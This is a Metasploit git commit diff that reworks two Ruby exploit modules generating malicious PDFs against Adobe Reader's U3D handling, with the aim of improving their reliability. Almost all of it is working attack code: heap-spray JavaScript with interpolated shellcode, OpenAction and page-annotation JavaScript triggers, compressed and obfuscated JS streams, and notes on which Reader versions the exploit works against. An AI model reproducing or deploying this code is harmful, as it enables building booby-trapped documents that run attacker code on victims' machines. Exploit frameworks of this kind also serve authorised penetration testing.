attempt to improve reliability of u3d pdf exploits
git-svn-id: file:///home/svn/framework3/trunk@7762 4d416f70-5f16-0410-b530-b9f4589650da
This commit is contained in:
parent
ff19b649f3
commit
4bcc8a93a3
@ -145,6 +145,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
return xarr;
|
||||
};
|
||||
var memoryz = spray("#{ptrA}","#{ptrB}","#{ptrC}","#{shellcode}");
|
||||
this.pageNum = 1;
|
||||
|
|
||||
|
||||
# Obfuscate it up a bit
|
||||
@ -191,6 +192,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
|
||||
#http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/
|
||||
def nObfu(str)
|
||||
return str
|
||||
|
||||
result = ""
|
||||
str.scan(/./u) do |c|
|
||||
@ -446,7 +448,10 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
|
||||
# catalog
|
||||
xref << pdf.length
|
||||
pdf << ioDef(3) << nObfu("<</Type/Catalog/Outlines ") << ioRef(4) << nObfu("/Pages ") << ioRef(5) << nObfu("/OpenAction ") << ioRef(9) << nObfu(">>")
|
||||
pdf << ioDef(3) << nObfu("<</Type/Catalog/Outlines ") << ioRef(4)
|
||||
pdf << nObfu("/Pages ") << ioRef(5)
|
||||
pdf << nObfu("/OpenAction ") << ioRef(8)
|
||||
pdf << nObfu(">>")
|
||||
pdf << obj_end
|
||||
|
||||
# outline
|
||||
@ -456,8 +461,9 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
|
||||
# kids
|
||||
xref << pdf.length
|
||||
pdf << ioDef(5) << nObfu("<</Type/Pages/Count 1/Kids [")
|
||||
pdf << ioRef(8) # u3d page
|
||||
pdf << ioDef(5) << nObfu("<</Type/Pages/Count 2/Kids [")
|
||||
pdf << ioRef(9) << " " # empty page
|
||||
pdf << ioRef(10) # u3d page
|
||||
pdf << nObfu("]>>")
|
||||
pdf << obj_end
|
||||
|
||||
@ -476,17 +482,23 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
pdf << nObfu("/Rect [0 0 640 480]/3DD ") << ioRef(6) << nObfu("/F 7>>")
|
||||
pdf << obj_end
|
||||
|
||||
# page 0 (u3d)
|
||||
# js dict
|
||||
xref << pdf.length
|
||||
pdf << ioDef(8) << nObfu("<</Type/Page/Parent ") << ioRef(5) << nObfu("/MediaBox [0 0 640 480]")
|
||||
pdf << ioDef(8) << nObfu("<</Type/Action/S/JavaScript/JS ") + ioRef(1) + ">>" << obj_end
|
||||
|
||||
# page 0 (empty)
|
||||
xref << pdf.length
|
||||
pdf << ioDef(9) << nObfu("<</Type/Page/Parent ") << ioRef(5) << nObfu("/MediaBox [0 0 640 480]")
|
||||
pdf << nObfu(" >>")
|
||||
pdf << obj_end
|
||||
|
||||
# page 1 (u3d)
|
||||
xref << pdf.length
|
||||
pdf << ioDef(10) << nObfu("<</Type/Page/Parent ") << ioRef(5) << nObfu("/MediaBox [0 0 640 480]")
|
||||
pdf << nObfu("/Annots [") << ioRef(7) << nObfu("]")
|
||||
pdf << nObfu(">>")
|
||||
pdf << obj_end
|
||||
|
||||
# js dict
|
||||
xref << pdf.length
|
||||
pdf << ioDef(9) << nObfu("<</Type/Action/S/JavaScript/JS ") + ioRef(1) + ">>" << obj_end
|
||||
|
||||
# xrefs
|
||||
xrefPosition = pdf.length
|
||||
pdf << "xref" << eol
|
||||
|
@ -58,7 +58,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||
# reader 7.1.1 - untested
|
||||
# reader 8.0.0 - untested
|
||||
# reader 8.1.2 - works
|
||||
# reader 8.1.3 - not working
|
||||
# reader 8.1.3 - not working :-/
|
||||
# reader 8.1.4 - untested
|
||||
# reader 8.1.5 - untested
|
||||
# reader 8.1.6 - untested
|
||||
@ -223,6 +223,7 @@ Original notes on heap technique used in this exploit:
|
||||
|
||||
var mem = prepareMemory(200);
|
||||
var holes = prepareHoles(6500);
|
||||
this.pageNum = 1;
|
||||
|
|
||||
js_pg1 = %Q|this.print((bUI:true, bSilent:false, bShrinkToFit:false));|
|
||||
|
||||
@ -399,7 +400,7 @@ Original notes on heap technique used in this exploit:
|
||||
# filename/comment
|
||||
pdf << "%" << RandomNonASCIIString(4) << eol
|
||||
|
||||
# js stream
|
||||
# js stream (doc open action js)
|
||||
xref << pdf.length
|
||||
compressed = Zlib::Deflate.deflate(ASCIIHexWhitespaceEncode(js_doc))
|
||||
pdf << ioDef(1) << nObfu("<</Length %s/Filter[/FlateDecode/ASCIIHexDecode]>>" % compressed.length) << eol
|
||||
@ -408,9 +409,20 @@ Original notes on heap technique used in this exploit:
|
||||
pdf << "endstream" << eol
|
||||
pdf << obj_end
|
||||
|
||||
# js stream 2 (page 1 annot js)
|
||||
xref << pdf.length
|
||||
compressed = Zlib::Deflate.deflate(ASCIIHexWhitespaceEncode(js_pg1))
|
||||
pdf << ioDef(2) << nObfu("<</Length %s/Filter[/FlateDecode/ASCIIHexDecode]>>" % compressed.length) << eol
|
||||
pdf << "stream" << eol
|
||||
pdf << compressed << eol
|
||||
pdf << "endstream" << eol
|
||||
pdf << obj_end
|
||||
|
||||
# catalog
|
||||
xref << pdf.length
|
||||
pdf << ioDef(3) << nObfu("<</Type/Catalog/Outlines ") << ioRef(4) << nObfu("/Pages ") << ioRef(5) << nObfu("/OpenAction ") << ioRef(9) << nObfu(">>")
|
||||
pdf << ioDef(3) << nObfu("<</Type/Catalog/Outlines ") << ioRef(4)
|
||||
pdf << nObfu("/Pages ") << ioRef(5)
|
||||
pdf << nObfu("/OpenAction ") << ioRef(8) << nObfu(">>")
|
||||
pdf << obj_end
|
||||
|
||||
# outline
|
||||
@ -418,10 +430,11 @@ Original notes on heap technique used in this exploit:
|
||||
pdf << ioDef(4) << nObfu("<</Type/Outlines/Count 0>>")
|
||||
pdf << obj_end
|
||||
|
||||
# kids
|
||||
# pages/kids
|
||||
xref << pdf.length
|
||||
pdf << ioDef(5) << nObfu("<</Type/Pages/Count 2/Kids [")
|
||||
pdf << ioRef(8) # u3d page
|
||||
pdf << ioRef(10) << " " # empty page
|
||||
pdf << ioRef(11) # u3d page
|
||||
pdf << nObfu("]>>")
|
||||
pdf << obj_end
|
||||
|
||||
@ -440,29 +453,26 @@ Original notes on heap technique used in this exploit:
|
||||
pdf << nObfu("/Rect [0 0 640 480]/3DD ") << ioRef(6) << nObfu("/F 7>>")
|
||||
pdf << obj_end
|
||||
|
||||
# page 0 (u3d/print)
|
||||
# js dict (open action js)
|
||||
xref << pdf.length
|
||||
pdf << ioDef(8) << nObfu("<</Type/Page/Parent ") << ioRef(5) << nObfu("/MediaBox [0 0 640 480]")
|
||||
pdf << nObfu("/Annots [") << ioRef(7) << nObfu("]")
|
||||
pdf << nObfu("/AA << /O ") << ioRef(10) << nObfu(">>")
|
||||
pdf << nObfu(">>")
|
||||
pdf << ioDef(8) << nObfu("<</Type/Action/S/JavaScript/JS ") + ioRef(1) + ">>" << obj_end
|
||||
|
||||
# js dict (page 1 annot js)
|
||||
xref << pdf.length
|
||||
pdf << ioDef(9) << nObfu("<</Type/Action/S/JavaScript/JS ") + ioRef(2) + ">>" << obj_end
|
||||
|
||||
# page 0 (empty)
|
||||
xref << pdf.length
|
||||
pdf << ioDef(10) << nObfu("<</Type/Page/Parent ") << ioRef(5) << nObfu("/MediaBox [0 0 640 480]")
|
||||
pdf << nObfu(" >>")
|
||||
pdf << obj_end
|
||||
|
||||
# js dict
|
||||
# page 1 (u3d/print)
|
||||
xref << pdf.length
|
||||
pdf << ioDef(9) << nObfu("<</Type/Action/S/JavaScript/JS ") + ioRef(1) + ">>" << obj_end
|
||||
|
||||
# js dict
|
||||
xref << pdf.length
|
||||
pdf << ioDef(10) << nObfu("<</Type/Action/S/JavaScript/JS ") + ioRef(11) + ">>" << obj_end
|
||||
|
||||
# js stream 2
|
||||
xref << pdf.length
|
||||
compressed = Zlib::Deflate.deflate(ASCIIHexWhitespaceEncode(js_pg1))
|
||||
pdf << ioDef(11) << nObfu("<</Length %s/Filter[/FlateDecode/ASCIIHexDecode]>>" % compressed.length) << eol
|
||||
pdf << "stream" << eol
|
||||
pdf << compressed << eol
|
||||
pdf << "endstream" << eol
|
||||
pdf << ioDef(11) << nObfu("<</Type/Page/Parent ") << ioRef(5) << nObfu("/MediaBox [0 0 640 480]")
|
||||
pdf << nObfu("/Annots [") << ioRef(7) << nObfu("]")
|
||||
pdf << nObfu("/AA << /O ") << ioRef(9) << nObfu(">>")
|
||||
pdf << nObfu(">>")
|
||||
pdf << obj_end
|
||||
|
||||
# xrefs
|
||||
|